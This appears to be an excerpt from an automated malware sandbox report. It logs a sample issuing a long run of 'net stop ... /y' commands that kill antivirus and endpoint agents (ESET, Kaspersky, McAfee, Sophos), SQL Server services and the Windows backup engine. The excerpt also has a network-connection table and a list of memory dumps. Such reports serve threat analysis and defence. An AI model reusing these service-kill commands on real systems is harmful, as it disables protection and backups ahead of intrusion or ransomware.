C:\Windows\system32\net1 stop MSSQLServerADHelper /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SQLAgent$PROD /y
C:\Windows\SysWOW64\net.exe
net stop SQLAgent$PROD /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PROD /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop msftesql$PROD /y
C:\Windows\SysWOW64\net.exe
net stop msftesql$PROD /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop msftesql$PROD /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop NetMsmqActivator /y
C:\Windows\SysWOW64\net.exe
net stop NetMsmqActivator /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop NetMsmqActivator /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop EhttpSrv /y
C:\Windows\SysWOW64\net.exe
net stop EhttpSrv /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EhttpSrv /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop ekrn /y
C:\Windows\SysWOW64\net.exe
net stop ekrn /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ekrn /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop ESHASRV /y
C:\Windows\SysWOW64\net.exe
net stop ESHASRV /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ESHASRV /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQL$SOPHOS /y
C:\Windows\SysWOW64\net.exe
net stop MSSQL$SOPHOS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SOPHOS /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SQLAgent$SOPHOS /y
C:\Windows\SysWOW64\net.exe
net stop SQLAgent$SOPHOS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SOPHOS /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop AVP /y
C:\Windows\SysWOW64\net.exe
net stop AVP /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AVP /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop klnagent /y
C:\Windows\SysWOW64\net.exe
net stop klnagent /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop klnagent /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQL$SQLEXPRESS /y
C:\Windows\SysWOW64\net.exe
net stop MSSQL$SQLEXPRESS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SQLAgent$SQLEXPRESS /y
C:\Windows\SysWOW64\net.exe
net stop SQLAgent$SQLEXPRESS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop wbengine /y
C:\Windows\SysWOW64\net.exe
net stop wbengine /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop wbengine /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop mfefire /y
C:\Windows\SysWOW64\net.exe
net stop mfefire /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mfefire /y
Network
| Country | Destination | Domain | Proto |
| NL | 20.190.160.67:443 | tcp | |
| NL | 20.190.160.67:443 | tcp | |
| NL | 20.190.160.67:443 | tcp | |
| N/A | 10.127.0.1:445 | tcp | |
| N/A | 10.127.0.1:139 | tcp | |
| NL | 20.190.160.8:443 | tcp | |
| NL | 20.190.160.8:443 | tcp | |
| NL | 20.190.160.8:443 | tcp | |
| US | 52.182.143.208:443 | tcp | |
| NL | 20.190.160.2:443 | tcp | |
| NL | 20.190.160.2:443 | tcp | |
| NL | 20.190.160.2:443 | tcp | |
| NL | 178.79.208.1:80 | tcp | |
| NL | 178.79.208.1:80 | tcp | |
| NL | 178.79.208.1:80 | tcp | |
| NL | 20.190.160.136:443 | tcp | |
| NL | 20.190.160.136:443 | tcp | |
| NL | 20.190.160.136:443 | tcp | |
| NL | 104.110.191.133:80 | tcp | |
| NL | 20.190.160.73:443 | tcp | |
| NL | 20.190.160.73:443 | tcp | |
| NL | 20.190.160.73:443 | tcp | |
| NL | 20.190.160.71:443 | tcp | |
| NL | 20.190.160.71:443 | tcp | |
| NL | 20.190.160.71:443 | tcp |
Files
memory/5100-130-0x0000000000000000-mapping.dmp
memory/2404-131-0x0000000000000000-mapping.dmp
memory/1932-132-0x0000000000000000-mapping.dmp
memory/3540-133-0x0000000000000000-mapping.dmp
memory/4204-134-0x0000000000000000-mapping.dmp
memory/4252-135-0x0000000000000000-mapping.dmp
memory/1148-136-0x0000000000000000-mapping.dmp
memory/612-137-0x0000000000000000-mapping.dmp
memory/4196-138-0x0000000000000000-mapping.dmp
memory/364-139-0x0000000000000000-mapping.dmp
memory/2892-140-0x0000000000000000-mapping.dmp
memory/668-141-0x0000000000000000-mapping.dmp
memory/232-142-0x0000000000000000-mapping.dmp
memory/4244-143-0x0000000000000000-mapping.dmp
memory/1248-144-0x0000000000000000-mapping.dmp
memory/1564-145-0x0000000000000000-mapping.dmp
memory/4432-146-0x0000000000000000-mapping.dmp
memory/4804-147-0x0000000000000000-mapping.dmp
memory/4600-148-0x0000000000000000-mapping.dmp
memory/3384-149-0x0000000000000000-mapping.dmp
memory/2328-150-0x0000000000000000-mapping.dmp
memory/3184-151-0x0000000000000000-mapping.dmp
memory/3092-152-0x0000000000000000-mapping.dmp
memory/3848-153-0x0000000000000000-mapping.dmp
memory/4464-154-0x0000000000000000-mapping.dmp
memory/3644-155-0x0000000000000000-mapping.dmp
memory/1496-156-0x0000000000000000-mapping.dmp
memory/1964-157-0x0000000000000000-mapping.dmp
memory/3712-158-0x0000000000000000-mapping.dmp
memory/2112-159-0x0000000000000000-mapping.dmp
memory/2412-160-0x0000000000000000-mapping.dmp
memory/2216-161-0x0000000000000000-mapping.dmp
memory/2184-162-0x0000000000000000-mapping.dmp
memory/2596-163-0x0000000000000000-mapping.dmp
memory/4720-164-0x0000000000000000-mapping.dmp
memory/1568-165-0x0000000000000000-mapping.dmp
memory/4520-166-0x0000000000000000-mapping.dmp
memory/1432-167-0x0000000000000000-mapping.dmp
memory/3940-168-0x0000000000000000-mapping.dmp
memory/4620-169-0x0000000000000000-mapping.dmp
memory/2460-170-0x0000000000000000-mapping.dmp
memory/828-171-0x0000000000000000-mapping.dmp
memory/2908-172-0x0000000000000000-mapping.dmp
memory/4320-173-0x0000000000000000-mapping.dmp
memory/4912-174-0x0000000000000000-mapping.dmp
memory/5096-175-0x0000000000000000-mapping.dmp
memory/1552-176-0x0000000000000000-mapping.dmp
memory/4544-177-0x0000000000000000-mapping.dmp
memory/1932-178-0x0000000000000000-mapping.dmp
memory/4496-179-0x0000000000000000-mapping.dmp
memory/3540-180-0x0000000000000000-mapping.dmp
memory/4204-181-0x0000000000000000-mapping.dmp
memory/4260-182-0x0000000000000000-mapping.dmp
memory/4256-183-0x0000000000000000-mapping.dmp
memory/1148-184-0x0000000000000000-mapping.dmp
memory/2640-185-0x0000000000000000-mapping.dmp
memory/3944-186-0x0000000000000000-mapping.dmp
memory/2032-187-0x0000000000000000-mapping.dmp
memory/664-188-0x0000000000000000-mapping.dmp
memory/3464-189-0x0000000000000000-mapping.dmp
memory/4100-190-0x0000000000000000-mapping.dmp
memory/1504-191-0x0000000000000000-mapping.dmp
memory/1684-192-0x0000000000000000-mapping.dmp
memory/4712-193-0x0000000000000000-mapping.dmp